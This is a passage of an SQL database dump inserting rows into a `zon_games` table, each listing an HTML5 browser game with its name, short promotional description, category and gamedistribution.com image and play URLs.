(665, 'Impossible Moto Bike Track Stunts', 'In this Impossible Moto Bike Track Stunts, you must have a real motorbike stunt driving skills. We believe that you will enjoy ramp bike game a lot of addictive fun by playing this real moto bike stunt game that is most attractive impossible bike track stunt in the sky road environment. ', 'https://img.gamedistribution.com/668de3cf8bfc439d8dfd82ede6dfe5a5-512x384.jpeg', 'https://html5.gamedistribution.com/668de3cf8bfc439d8dfd82ede6dfe5a5/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(666, 'Amazing Park Reckless Roller Coaster 2019', 'Roller Coaster  must be a good  for players of simulator games and racing games. Feel the real 3d graphics with different parts of environments rain city. Keep upgrading your coaster to progressing game play. Levels are from easy to hard', 'https://img.gamedistribution.com/e1d39af7155a4de9a82a818f4972cd4c-512x340.jpeg', 'https://html5.gamedistribution.com/e1d39af7155a4de9a82a818f4972cd4c/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/e1d39af7155a4de9a82a818f4972cd4c-1280x720.jpeg', 0, ''),
(667, 'Striker Dummies', 'Striker Dummies is a hammer fighting game .You need to destroy 5 dummies to win, in 2 player mode or against AI Dummy.', 'https://img.gamedistribution.com/5395ef221e064277b8d8d7a6ba0496c9-512x384.jpeg', 'https://html5.gamedistribution.com/5395ef221e064277b8d8d7a6ba0496c9/', '0', 'Battle', 0, 0, 'https://img.gamedistribution.com/5395ef221e064277b8d8d7a6ba0496c9-1280x550.jpeg', 0, ''),
(668, 'White Archer', 'White Archer is a casual game made for all type of audience mainly focusing on casual gaming community.\nPrecise every shot with your aiming skills and get listed in the top of the archerie.\nShoot arrows in the middle of the target and gain an extra arrow.', 'https://img.gamedistribution.com/924b4a6cd5ae4b6494ecf65772a0a8fe-512x384.jpeg', 'https://html5.gamedistribution.com/924b4a6cd5ae4b6494ecf65772a0a8fe/', '0', 'Shooter', 0, 0, '', 0, ''),
(669, 'Help Stickman Burn', 'Throw burning man into the water before explode to complete a level\nRed balloon can be removed also', 'https://img.gamedistribution.com/de778414d3544d09b4e6fbbfe3aab81e-512x384.jpeg', 'https://html5.gamedistribution.com/de778414d3544d09b4e6fbbfe3aab81e/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/de778414d3544d09b4e6fbbfe3aab81e-1280x720.jpeg', 0, ''),
(670, 'Pino', 'Eat more fish as you can but watch on bombs. Yo need to eat all fish, and if you drop more than 3 fish the game will over.', 'https://img.gamedistribution.com/266b7320a24f48f3903c86144389b9f4-512x384.jpeg', 'https://html5.gamedistribution.com/266b7320a24f48f3903c86144389b9f4/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/266b7320a24f48f3903c86144389b9f4-1280x550.jpeg', 0, ''),
(671, 'BTS Cute Cats Coloring', 'BTS Cute Cats Coloring is fun coloring game suitable for all ages. If you like cats you will love this game. Choose one of the images and color it the way you like. No time, no rush. Have fun coloring.', 'https://img.gamedistribution.com/f4fd53f2dcf34326bb527446fefe0d83-512x384.jpeg', 'https://html5.gamedistribution.com/f4fd53f2dcf34326bb527446fefe0d83/', '0', 'Art', 0, 0, '', 0, ''),
(672, 'Car Stunt Rider', 'Car Stunt Rider features:\n- multiple cars\n- multiple levels', 'https://img.gamedistribution.com/79eeaafa334e4979be1dc219156386d0-1280x550.jpeg', 'https://html5.gamedistribution.com/79eeaafa334e4979be1dc219156386d0/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/79eeaafa334e4979be1dc219156386d0-512x384.jpeg', 0, ''),
(673, 'Picker 3D', 'The picker is coming to clean the road, collects more pieces, completes the goal of each level, and moves on to the next level.', 'https://img.gamedistribution.com/7fb847ca2c8a49bc803347126a4a9f90-512x384.jpeg', 'https://html5.gamedistribution.com/7fb847ca2c8a49bc803347126a4a9f90/', '0', 'Casual', 0, 0, '', 0, ''),
(674, 'Bus Parking Simulator 3D', 'Bus Parking Simulator 3D fun addictive hypercasual game. Bus Parking Simulator 3D puts you in the driving seat of a bus, which you need to park in a series of increasingly difficult challenges.If you thought parking a car was tricky then wait until you try guiding a bus into a tight parking spot.', 'https://img.gamedistribution.com/5642504b532b453eaf0b733a80eb4e1e-512x384.jpeg', 'https://html5.gamedistribution.com/5642504b532b453eaf0b733a80eb4e1e/', '0', 'Simulation', 0, 0, '', 0, ''),
(675, 'Marvelous Hot Wheels', 'Stunts take you to a realistic journey of stunt driving and hot wheels race . Modern highway train car stunt is one of the best and much popular train vs car stunt riding 3d game. Enjoy the real train vs car jumping simulation game to become the crazy stunt driver and Hot Wheels stunt rider on city traffic roads.', 'https://img.gamedistribution.com/f440379e3a5b4744b72eff38c92c7e71-512x384.jpeg', 'https://html5.gamedistribution.com/f440379e3a5b4744b72eff38c92c7e71/', '0', 'Casual', 0, 0, '', 0, ''),
(676, 'Spill the Beer!', 'Drop the ball to knock on the glass and spill the beer! ', 'https://img.gamedistribution.com/567e9596770a4a4c9425f66ab8ccca2f-512x384.jpeg', 'https://html5.gamedistribution.com/567e9596770a4a4c9425f66ab8ccca2f/', '0', 'Casual', 0, 0, '', 0, ''),
(677, 'Hill Climb Driving', 'Hill Climb Driving is fun addictive adventure riving game.In this game you have to pick up the passenger and drop them to their respective destination before time .But wait its not going to be easy. Lots of obstacles are waiting for you you have to dodge all of them.', 'https://img.gamedistribution.com/41a6b329bc394579ab300680d6bae90e-512x512.jpeg', 'https://html5.gamedistribution.com/41a6b329bc394579ab300680d6bae90e/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(678, 'Old Car Impossible Stunts', 'It’s time to play impossible car game ramp drive in which you will drive multiple cars like old vintage, classic, sports, muscle, racing and stunt cars. Go and enjoy this ramp car stunts driving free gameplay and become a professional trick master. ', 'https://img.gamedistribution.com/1c53d1effd55461885ed3f9a90014d38-512x512.jpeg', 'https://html5.gamedistribution.com/1c53d1effd55461885ed3f9a90014d38/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/1c53d1effd55461885ed3f9a90014d38-1280x550.jpeg', 0, ''),
(679, 'Summer Vacation Dressup', 'Summer is here! School\'s out and that means family vacation, awesome! Your parents are even letting you choose where to go, how cool is that?! But now the vacation is booked, plane tickets bought, suitcases packed all you need to do now is think of the perfect outfit for your flight and the first day on holiday. Choose something, summery, fresh, young and trendy, make several outfits until you can pick a favorite. I know whatever you come up with will be gorgeous!', 'https://img.gamedistribution.com/4c3a619e80344369869f87ce408db28a-512x384.jpeg', 'https://html5.gamedistribution.com/4c3a619e80344369869f87ce408db28a/', '0', 'Dress-up', 0, 0, '', 0, ''),
(680, 'Impossible Lite Dash', 'Impossible Lite Dash is fun addictive hypercasual game.Control the little squared character from side to side to avoid hitting all deadly obstacles on it’s way.', 'https://img.gamedistribution.com/4ef551b4ca844478a9210e1bcc2c3449-512x512.jpeg', 'https://html5.gamedistribution.com/4ef551b4ca844478a9210e1bcc2c3449/', '0', 'Casual', 0, 0, '', 0, ''),
(681, 'Zombie Smash', 'Zombie Smash is fun addictive action game.Smash all the zombies before they will enter in your space.', 'https://img.gamedistribution.com/097dc49017614aabaa191c3ddb3a3d51-512x512.jpeg', 'https://html5.gamedistribution.com/097dc49017614aabaa191c3ddb3a3d51/', '0', 'Shooter', 0, 0, '', 0, ''),
(682, 'Driver Rush', 'Driver Rush ultimate car driving game', 'https://img.gamedistribution.com/01bbd7bf4de24101826ab94bdbce296d-512x512.jpeg', 'https://html5.gamedistribution.com/01bbd7bf4de24101826ab94bdbce296d/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(683, 'Pixel Challenge', 'Pixel challenge is a quite hard platform game that you’ve never seen before, of course, there is no easy life, he has to avoid the spikes, or the fragile blocks or red blocks if he doesn’t want to start again. It means the white platforms are safe for him.', 'https://img.gamedistribution.com/5d33dbe2eb4a418e8373b729f3b02880-512x384.jpeg', 'https://html5.gamedistribution.com/5d33dbe2eb4a418e8373b729f3b02880/', '0', 'Casual', 0, 0, '', 0, ''),
(684, 'Formula Jigsaw', 'Formula Jigsaw is a fun online puzzle game. Drag the pieces into right position using mouse. Solving puzzles is relaxing, rewarding, and keeps your brain sharp. You need to spend $1000 to be able to purchase one of the following pictures. You have three modes for each picture from which the hardest mode brings more money. You have a total of 10 pictures.', 'https://img.gamedistribution.com/8476e658ea9a4abe889205e42e104b2f-512x384.jpeg', 'https://html5.gamedistribution.com/8476e658ea9a4abe889205e42e104b2f/', '0', 'Jigsaw', 0, 0, 'https://img.gamedistribution.com/8476e658ea9a4abe889205e42e104b2f-1280x550.jpeg', 0, ''),
(685, 'Tank Shootout', 'Tank shootout is an interesting skill based shooting game. Destroy all the targets to complete a level. Use mouse or touch input, to set the speed and direction of bullet to chase the target successfully.  You will get limited number of bullets for each level so use them wisely to win it. You can take the help of power panel to see the current power and last shot’s power. Mini map shows the position of target, the location where the previous shot reached etc.', 'https://img.gamedistribution.com/e164238014994607ba308d03f3cb6cdb-512x384.jpeg', 'https://html5.gamedistribution.com/e164238014994607ba308d03f3cb6cdb/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/e164238014994607ba308d03f3cb6cdb-1280x550.jpeg', 0, ''),
(686, 'Sandwich', 'How do sandwiches sandwich you decide!', 'https://img.gamedistribution.com/94773abf01a14f7da1261dcdd6ea3116-512x384.jpeg', 'https://html5.gamedistribution.com/94773abf01a14f7da1261dcdd6ea3116/', '0', 'Casual', 0, 0, '', 0, ''),
(687, 'City Cargo Trailer Transport', 'Get behind the wheels of a big trailer to deliver cargo to dangerous mountains and steep hills. Drive epic truck trailers on challenging and bumpy maneuvers to complete the transport job on time. This off road truck trailer is a truck simulator game for those who love tough challenges on unsolved roads.', 'https://img.gamedistribution.com/1e607788225549d3b042341417dd5564-512x384.jpeg', 'https://html5.gamedistribution.com/1e607788225549d3b042341417dd5564/', '0', 'Racing & Driving', 0, 0, '', 0, ''),
(688, 'Jelly Crush Match3', 'Your jelly buddies are here and do not expect from them anything less than long hours of fun and entertainment.Jelly Crush Match3 is fun addictive match3 game.Match 3 or more jellys to play the  game ', 'https://img.gamedistribution.com/1669d80847aa4c1f87279ed0662293f4-512x384.jpeg', 'https://html5.gamedistribution.com/1669d80847aa4c1f87279ed0662293f4/', '0', 'Puzzle', 0, 0, '', 0, ''),
(689, 'Trials Ride', 'Ride a trials motorbike through the hangar and overcome various challenging obstacles in your way. Keep the bike balanced and get to the finish in shortest time.', 'https://img.gamedistribution.com/e53de7a530004afca74f8d989d6c756d-512x512.jpeg', 'https://html5.gamedistribution.com/e53de7a530004afca74f8d989d6c756d/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/e53de7a530004afca74f8d989d6c756d-1280x550.jpeg', 0, ''),
(690, 'GunShoot', 'Use your brain in this unique shooting game. You will need precise aim and laser focus to take down enemies', 'https://img.gamedistribution.com/4d6c3b1bf7fb4cab8502a80b849afb66-512x384.jpeg', 'https://html5.gamedistribution.com/4d6c3b1bf7fb4cab8502a80b849afb66/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/4d6c3b1bf7fb4cab8502a80b849afb66-1280x550.jpeg', 0, ''),
(691, 'clash royale free', 'In the warcraft forest there is a group of warcraft unscrupulous destruction, brave callers quickly build a tower to protect the warcraft forest!\nNote that when building the tower, be sure to move to the blue area of the base of the tower and click on it to start building', 'https://img.gamedistribution.com/ff990c6a804e4cf8962f1603b5ae58fd-512x384.jpeg', 'https://html5.gamedistribution.com/ff990c6a804e4cf8962f1603b5ae58fd/', '0', 'Strategy', 0, 0, '', 0, ''),
(692, 'Cute Animals Memory', 'Cute Animal Memory is a free online game from genre of memory and animal games. Flip the tiles and try to match them up in pairs. Pair up all the tiles to win. Try to complete the game in as few moves as possible! There are is 4 levels. Use mouse to click or tap to screen on the squares. Concentrate yourself and start to play. Enjoy!', 'https://img.gamedistribution.com/adafcecd85164a149b3cb6fc71351a19-512x384.jpeg', 'https://html5.gamedistribution.com/adafcecd85164a149b3cb6fc71351a19/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/adafcecd85164a149b3cb6fc71351a19-1280x550.jpeg', 0, ''),
(693, 'Aircraft Flying Simulator', 'Aircraft Flying Simulator is fun addictive adventure game.Take off in a realistic plane in this 3D Aircraft Flying  simulator game. Can you safely land after you enjoy a spin over the countryside below.', 'https://img.gamedistribution.com/a648dc902b374dfe8de78d5493a601a1-512x384.jpeg', 'https://html5.gamedistribution.com/a648dc902b374dfe8de78d5493a601a1/', '0', 'Simulation', 0, 0, '', 0, ''),
(694, 'Kids Scrambled Word', 'Learning doesn\'t have to be all boring numbers and flashcards all the time. Inject some fun into your kid\'s study time with this large fun collection of crossword puzzles for kids! ', 'https://img.gamedistribution.com/2ada1d66ef8942cc9d2294551688f01e-1280x720.jpeg', 'https://html5.gamedistribution.com/2ada1d66ef8942cc9d2294551688f01e/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/2ada1d66ef8942cc9d2294551688f01e-512x512.jpeg', 0, ''),
(695, 'Falling Apples Drawing', 'Apple drop puzzle game Draw Lines for apple path is a new Puzzle game .\nMake the bucket happy By filling it with fresh apples.', 'https://img.gamedistribution.com/c4132214033d4619baf7c67eb96e01b1-512x512.jpeg', 'https://html5.gamedistribution.com/c4132214033d4619baf7c67eb96e01b1/', '0', 'Art', 0, 0, 'https://img.gamedistribution.com/c4132214033d4619baf7c67eb96e01b1-1280x550.jpeg', 0, ''),
(696, 'Fish World Match3', 'Your Fish buddies are here and do not expect from them anything less than long hours of fun and entertainment .Fish World Match3 is fun addicting adventure puzzle match3 game.Connect 3 or more fishes.', 'https://img.gamedistribution.com/518852b65c2c431b9779e4ca9accfc14-512x384.jpeg', 'https://html5.gamedistribution.com/518852b65c2c431b9779e4ca9accfc14/', '0', 'Puzzle', 0, 0, '', 0, ''),
(697, 'Puzzle Tractor Farm', ' Solve the farming puzzle. \nThe goal of the game is easy.\nGo through all the areas without leaving any and without going through it twice.\n', 'https://img.gamedistribution.com/e7a2beb4362d40229206b7a8306728dd-512x340.jpeg', 'https://html5.gamedistribution.com/e7a2beb4362d40229206b7a8306728dd/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/e7a2beb4362d40229206b7a8306728dd-1280x720.jpeg', 0, '');
INSERT INTO `zon_games` (`id`, `game_name`, `game_description`, `game_image_url`, `game_url`, `game_published`, `game_category`, `game_status`, `game_played`, `game_banner_url`, `is_featured`, `game_card_size`) VALUES
(698, 'Ping Pong Goal', 'Ping Pong Goal is a Casual football / soccer game mixed with tennis elements, where the player must compete against the opponent to secure a match win. Perfect for a quick gaming session!\nEasy to pick and perfect for all ages, as you must tap on the paddle and just shoot the ball.', 'https://img.gamedistribution.com/36247a4b8bd8459eb07f6150097ebe47-512x384.jpeg', 'https://html5.gamedistribution.com/36247a4b8bd8459eb07f6150097ebe47/', '0', 'Football', 0, 0, 'https://img.gamedistribution.com/36247a4b8bd8459eb07f6150097ebe47-1280x550.jpeg', 0, ''),
(699, 'Knife Storm', 'Knife Storm game lets you enjoy and use various unique knifes in 3 different gameplays. 3 different gameplay mode could be played solo or 2 Player.\nIn “Classic” mode, you need to throw all the knives successfully to a rotating table or fruits etc. Knives cannot hit each other! In the “Shoot” mode, you need to throw knives at flying fruits; you should avoid the bombs and keep an eye on remaining time! In the third mode, “Ninja”, you will try to slice the flying fruits by using the mouse… ', 'https://img.gamedistribution.com/198b56036df241329c81a0689236e723-512x384.jpeg', 'https://html5.gamedistribution.com/198b56036df241329c81a0689236e723/', '0', 'Battle', 0, 0, 'https://img.gamedistribution.com/198b56036df241329c81a0689236e723-1280x720.jpeg', 0, ''),
(700, 'EG Supercars Puzzle', 'EG Supercars Puzzle - HTML5 Games - very nice game for kids with sports cars puzzles! Ecaps Games with tons of games for all ages and bringing fun to player Play free online games Have fun!', 'https://img.gamedistribution.com/1ea1fab830df47e8b82ca26a4360f34a-512x384.jpeg', 'https://html5.gamedistribution.com/1ea1fab830df47e8b82ca26a4360f34a/', '0', 'Puzzle', 0, 0, '', 0, ''),
(701, 'Biggy Way', 'Biggy Way is fun addictive monstercar game.In this game you have to cross all the hurdles to reach your destination.', 'https://img.gamedistribution.com/2f7888832253420c97919345f242004b-512x384.jpeg', 'https://html5.gamedistribution.com/2f7888832253420c97919345f242004b/', '0', 'Adventure', 0, 0, '', 0, ''),
(702, 'Lollipop True Color', 'In this game, there will be a lot of difference lollipops and you need to guess the color of lollipop. For one minute make the best score, and guess many correct answers as you can.', 'https://img.gamedistribution.com/9cce78f2f0d14f19a537c1709c4518c7-512x384.jpeg', 'https://html5.gamedistribution.com/9cce78f2f0d14f19a537c1709c4518c7/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/9cce78f2f0d14f19a537c1709c4518c7-1280x550.jpeg', 0, ''),
(703, 'FootyZag', 'Addictive and unusual football game that will make you curl your hair. 20 strange teams are gathered from all over the world to decide who\'s the best. Consult a doctor or pharmacist before playing.', 'https://img.gamedistribution.com/df1cfb49167e4202b266291bf21098b9-512x384.jpeg', 'https://html5.gamedistribution.com/df1cfb49167e4202b266291bf21098b9/', '0', 'Football', 0, 0, 'https://img.gamedistribution.com/df1cfb49167e4202b266291bf21098b9-1280x550.jpeg', 0, ''),
(704, 'Bike Parking', 'Bike Parking features:\n- multiple levels\n- multiple bike skins', 'https://img.gamedistribution.com/57e3c8ac4ad94aca8531a6d6919d2633-1280x550.jpeg', 'https://html5.gamedistribution.com/57e3c8ac4ad94aca8531a6d6919d2633/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/57e3c8ac4ad94aca8531a6d6919d2633-512x384.jpeg', 0, ''),
(705, 'Monster Truck Port Stunt', 'Would you like to test your driving skills in a unique Stunt game? You need to take monster trucks to the port through a way made out of shipping containers. But, it is not as easy as it seems; there are several traps on the road and some containers are placed in an inclination.\n\n', 'https://img.gamedistribution.com/a08b2f33a3a64efca5fb272659eeed68-512x384.jpeg', 'https://html5.gamedistribution.com/a08b2f33a3a64efca5fb272659eeed68/', '0', 'Battle', 0, 0, 'https://img.gamedistribution.com/a08b2f33a3a64efca5fb272659eeed68-1280x720.jpeg', 0, ''),
(706, 'Bird Platform Jumping', 'The main character is a cat\nwho had to flee their barriers to go to an upper floor', 'https://img.gamedistribution.com/278a33dd1c5045e69a67a2a2552f9ac7-512x384.jpeg', 'https://html5.gamedistribution.com/278a33dd1c5045e69a67a2a2552f9ac7/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/278a33dd1c5045e69a67a2a2552f9ac7-1280x550.jpeg', 0, ''),
(707, 'Robotex', 'Robotex is fun addictive boys puzzle game.In this game you will assemble different types of Robots. So guys  be ready for some adventure.', 'https://img.gamedistribution.com/e27345eb7ef24fa09f62e71fe7fb556f-512x384.jpeg', 'https://html5.gamedistribution.com/e27345eb7ef24fa09f62e71fe7fb556f/', '0', 'Casual', 0, 0, '', 0, ''),
(708, 'Zombie Survival Shooter', 'Zombies and zombie dog attack in modern city kill all zombie and save your city !!!\n- More than 5 brand new Zombie missions to compete in and complete\n- 8 Weapons (PISTOL, 9mm SILENCER, M16A4, SHOT GUN, MACHINE GUN, A400 SHOT GUN, MP44, HAND GRENADE)\n- Armor And Grenade option\n- Unique City MAPS TO CHOOSE\n- REALISTIC SETTINGS FOR INTENSE BATTLES\n- EASY TO LEARN GAMEPLAY', 'https://img.gamedistribution.com/0b024225d85c491fa77a271d46f64ca6-512x384.jpeg', 'https://html5.gamedistribution.com/0b024225d85c491fa77a271d46f64ca6/', '0', 'Shooter', 0, 0, '', 0, ''),
(709, 'Copter Fi', 'Shoot enemy while tapping the copter,Big boss will come on your way be focus.Upgrade weapon and copter to max to make you strong.', 'https://img.gamedistribution.com/9e578f5a7f5047b4a2fcaa378345c143-512x512.jpeg', 'https://html5.gamedistribution.com/9e578f5a7f5047b4a2fcaa378345c143/', '0', 'Battle', 0, 0, 'https://img.gamedistribution.com/9e578f5a7f5047b4a2fcaa378345c143-1280x550.jpeg', 0, ''),
(710, 'Escape From Zombies', 'You are a survivor of a zombie apocalypse and you\'re stuck in a building with a broken car and hordes of zombies are attacking in the lawn. But wait, you found tools enough to fix the car to escape from the hordes of zombies. ARE YOU READY FOR IT?\n\nYou are trying to fix the car while trying to defend yourself against hordes of zombies. Roll for success on each section. Any zombie that survived will attack the barricade. When you successfully killed 10 zombies you will be rewarded with power-up.', 'https://img.gamedistribution.com/941fd0bbe4584ea4aa001e5fdf569737-512x384.jpeg', 'https://html5.gamedistribution.com/941fd0bbe4584ea4aa001e5fdf569737/', '0', 'Shooter', 0, 0, 'https://img.gamedistribution.com/941fd0bbe4584ea4aa001e5fdf569737-1280x550.jpeg', 0, ''),
(711, 'Gold Miner Jack 2', 'Hello, little miner! Ready to collect the gold and diamonds? You can shop at the grocery store with your savings. Come on then your dig and your shovel are waiting for you! Have fun!', 'https://img.gamedistribution.com/feaf93651a3b408497a982c735037fed-512x384.jpeg', 'https://html5.gamedistribution.com/feaf93651a3b408497a982c735037fed/', '0', 'Adventure', 0, 0, 'https://img.gamedistribution.com/feaf93651a3b408497a982c735037fed-1280x720.jpeg', 0, ''),
(712, 'Perfect Slices', 'Fruits and vegetables, Cut Cut Cut! Leisure and recreational! How many levels can you pass!', 'https://img.gamedistribution.com/f6ecc60ba96e4ceb8420e89922cddc34-512x384.jpeg', 'https://html5.gamedistribution.com/f6ecc60ba96e4ceb8420e89922cddc34/', '0', 'Casual', 0, 0, '', 0, ''),
(713, 'City Bus Simulator', 'City Bus Simulator features:\n- multiple bus skins\n- 2 environments\n- multiple levels', 'https://img.gamedistribution.com/1a3a5f9569b643558a31e562bfc7fd0f-1280x550.jpeg', 'https://html5.gamedistribution.com/1a3a5f9569b643558a31e562bfc7fd0f/', '0', 'Simulation', 0, 0, 'https://img.gamedistribution.com/1a3a5f9569b643558a31e562bfc7fd0f-512x512.jpeg', 0, ''),
(714, 'Find The Pairs', 'Find The Pairs is fun addictive puzzle game.This game is perfect for kids who loves to match the similar images.', 'https://img.gamedistribution.com/1d6f90d0ab0e4d2883bae7b4e09ead27-512x512.jpeg', 'https://html5.gamedistribution.com/1d6f90d0ab0e4d2883bae7b4e09ead27/', '0', 'Casual', 0, 0, '', 0, ''),
(715, 'Watermelon Smasher Frenzy', 'Smash and slice watermelons like a ninja in this smasher game for all ages. You must smash green watermelons and avoid the red ones as the fruit appear, while trying to not get out of time. You will need a lot of experience in order to survive in this simple but fun game!', 'https://img.gamedistribution.com/8f9d8d659f2d4534acdd4aa8fb55ba92-512x384.jpeg', 'https://html5.gamedistribution.com/8f9d8d659f2d4534acdd4aa8fb55ba92/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/8f9d8d659f2d4534acdd4aa8fb55ba92-1280x550.jpeg', 0, ''),
(716, 'Coordinates Rush', 'Guide the hero to the location given in the Search Coordinate box by clicking on the corresponding location on the coordinate grid. Getting the hero to the correct location will award 500 points while an incorrect location will deduct 200 points from your score. Get as many points as you can before the 3 minute timer runs out.', 'https://img.gamedistribution.com/a7f8bf0b187b4ddb9cb8cf72c3196813-512x512.jpeg', 'https://html5.gamedistribution.com/a7f8bf0b187b4ddb9cb8cf72c3196813/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/a7f8bf0b187b4ddb9cb8cf72c3196813-512x384.jpeg', 0, ''),
(717, 'Car Mechanic 2017', 'If you have not play any career oriented game then here is a great game for you. It’s not just career oriented game it got so many things to learn with some real fun. It a fun realistic game.in this game you have to be an auto mechanic. \nInstructions: WASD - move', 'https://img.gamedistribution.com/4be807e5adb24db19438f2c6aed5c0bf-512x384.jpeg', 'https://html5.gamedistribution.com/4be807e5adb24db19438f2c6aed5c0bf/', '0', 'Simulation', 0, 0, '', 0, ''),
(718, 'Monsters Memory Match', 'Monsters Memory Match is fun html5 game suitable for all ages. The aim of the game is to find all matching images to clear the level. No time limit, no rush. Have fun playing.', 'https://img.gamedistribution.com/4f4de12401154a60ba7b46cdeb1f0d7b-512x384.jpeg', 'https://html5.gamedistribution.com/4f4de12401154a60ba7b46cdeb1f0d7b/', '0', 'Puzzle', 0, 0, '', 0, ''),
(719, '2020 Honda Civic Si Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: 2020 Honda Civic Si Puzzle. All images is with the 2020 Honda Civic Si. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/dfed39bfa2f74f80927f3c4eed359096-512x384.jpeg', 'https://html5.gamedistribution.com/dfed39bfa2f74f80927f3c4eed359096/', '0', 'Puzzle', 0, 0, '', 0, ''),
(720, 'Tetrix Blocks', 'Drag and drop the blocks from left to right or from right to left, in order to fill a complete row of blocks to eliminate them. Collect more rows at a time to get more score.', 'https://img.gamedistribution.com/ce3a5949b6dd4bf39c654a7cb616423a-512x512.jpeg', 'https://html5.gamedistribution.com/ce3a5949b6dd4bf39c654a7cb616423a/', '0', 'Puzzle', 0, 0, 'https://img.gamedistribution.com/ce3a5949b6dd4bf39c654a7cb616423a-512x384.jpeg', 0, ''),
(721, 'Scatty Maps Asia', 'Great educational game to learn about geography of Asia. Two modes of play, easy and full map, will amuse both younger and more advanced maps enthusiasts.', 'https://img.gamedistribution.com/ef31c64760ac47569816df93a93af8da-512x384.jpeg', 'https://html5.gamedistribution.com/ef31c64760ac47569816df93a93af8da/', '0', 'Puzzle', 0, 0, '', 0, ''),
(722, 'dunk hoop', 'Play the basket hoop not the ball!\n\nThis time, you control the basket hoop and you have to catch all the balls!\n\nThe best basketball game!', 'https://img.gamedistribution.com/38d25f62e5d44e36a91a368039a9bf8f-512x384.jpeg', 'https://html5.gamedistribution.com/38d25f62e5d44e36a91a368039a9bf8f/', '0', 'Basketball', 0, 0, '', 0, ''),
(723, 'Bugatti Centodieci Puzzle', 'Play with 6 images in this perfect jigsaw puzzle game: Bugatti Centodieci Puzzle. All images is with the bugatti centodieci. Solve all puzzles and keep your brain sharp. You have four modes for each picture, 16 pieces, 36 pieces, 64 pieces and 100 pieces. Enjoy and have fun.', 'https://img.gamedistribution.com/6b6a4013a2954210af5fa357e44981ea-512x384.jpeg', 'https://html5.gamedistribution.com/6b6a4013a2954210af5fa357e44981ea/', '0', 'Puzzle', 0, 0, '', 0, ''),
(724, 'EG Math Kid', 'EG Math Kid is HTML5 games - very nice game for kids with mathematics! Ecaps Games with tons of games for all ages and bringing fun to player Play free online games Have fun!', 'https://img.gamedistribution.com/1bfe5f387d5b4c6da03bc54c10f8e470-512x384.jpeg', 'https://html5.gamedistribution.com/1bfe5f387d5b4c6da03bc54c10f8e470/', '0', 'Educational', 0, 0, '', 0, ''),
(725, 'Cute Dogs Jigsaw', 'Cute Dogs Jigsaw is a free online game from genre of puzzle and jigsaw games. You can select one of the 12 images and then select one of the three modes: easy with 25 pieces, medium with 49 pieces and hard with 100 pieces. Have fun and enjoy!', 'https://img.gamedistribution.com/483d23ff1c044822940b9caca1813a30-512x384.jpeg', 'https://html5.gamedistribution.com/483d23ff1c044822940b9caca1813a30/', '0', 'Jigsaw', 0, 0, 'https://img.gamedistribution.com/483d23ff1c044822940b9caca1813a30-1280x550.jpeg', 0, ''),
(726, 'Tropical Slasher', 'In this game Tropical Slasher your task is to cut all the fruits and not to let you escape. The knife must be hung on the side trees. You have to avoid the bombs, because if you hit the bomb the game ends. You are limited in time and collect as many points as possible. Good luck.', 'https://img.gamedistribution.com/db12c33f358643eba7b9fc2f27a58317-512x384.jpeg', 'https://html5.gamedistribution.com/db12c33f358643eba7b9fc2f27a58317/', '0', 'Casual', 0, 0, 'https://img.gamedistribution.com/db12c33f358643eba7b9fc2f27a58317-1280x550.jpeg', 0, ''),
(727, 'ATM Cash Deposit', 'ATM Cash Deposit is fun addictive adventure game.This is a very interesting game .In this game you have to roam in the city and deposit cash in all the ATM\'s\nHow To Play:\nWASD ---Arrow Keys Movement(Car and Player)\nLeft Shift --To Run the Player\nC  -- Crouch\nLeft Mouse Click -- To Fight\n', 'https://img.gamedistribution.com/44523b7972094ceca4e6b94591ed7ff8-512x384.jpeg', 'https://html5.gamedistribution.com/44523b7972094ceca4e6b94591ed7ff8/', '0', 'Adventure', 0, 0, '', 0, ''),
(728, 'EG Super PonGoal', 'EG Super PonGoal is HTML5 games - It is currently the most advanced version of the game of ping pong, right in the game menu you can change the ball to any of the presented the menu, choose the cards to change the level of difficulty of the enemy robot, able to choose the duration of the game round from 1 to 10 minutes, can also be choose flight speed and rotation of the ball! Ecaps Games with tons of games for all ages and bringing fun to player Play free online games Have fun!', 'https://img.gamedistribution.com/849724eedd604ff9b5cdb61d98dd6196-512x384.jpeg', 'https://html5.gamedistribution.com/849724eedd604ff9b5cdb61d98dd6196/', '0', 'Casual', 0, 0, '', 0, ''),
(729, 'Mini Highway Crazy Traffic', 'Race through and avoid traffic and Reach destination before time ends. Avoid collisions, and enjoy the endless fun of thrill and action in single lane, dual lane, time trial, free ride and/or against a random player(dummy).', 'https://img.gamedistribution.com/fbf8b73e204745269d249d35376597ee-512x512.jpeg', 'https://html5.gamedistribution.com/fbf8b73e204745269d249d35376597ee/', '0', 'Racing & Driving', 0, 0, 'https://img.gamedistribution.com/fbf8b73e204745269d249d35376597ee-1280x720.jpeg', 0, ''),
(730, 'City Ambulance Simulator', 'City Ambulance Simulator is addictive driving game. Your role is to act like an ambulance driver of rescue games who has special sympathy for injured people of ambulance games. This act of kindness may prove life saving for the person of city car driving games who is in some painful condition due to some careless move on road. ', 'https://img.gamedistribution.com/d38a3d33b5724c7ba939191d00bdf798-512x384.jpeg', 'https://html5.gamedistribution.com/d38a3d33b5724c7ba939191d00bdf798/', '0', 'Simulation', 0, 0, '', 0, ''),
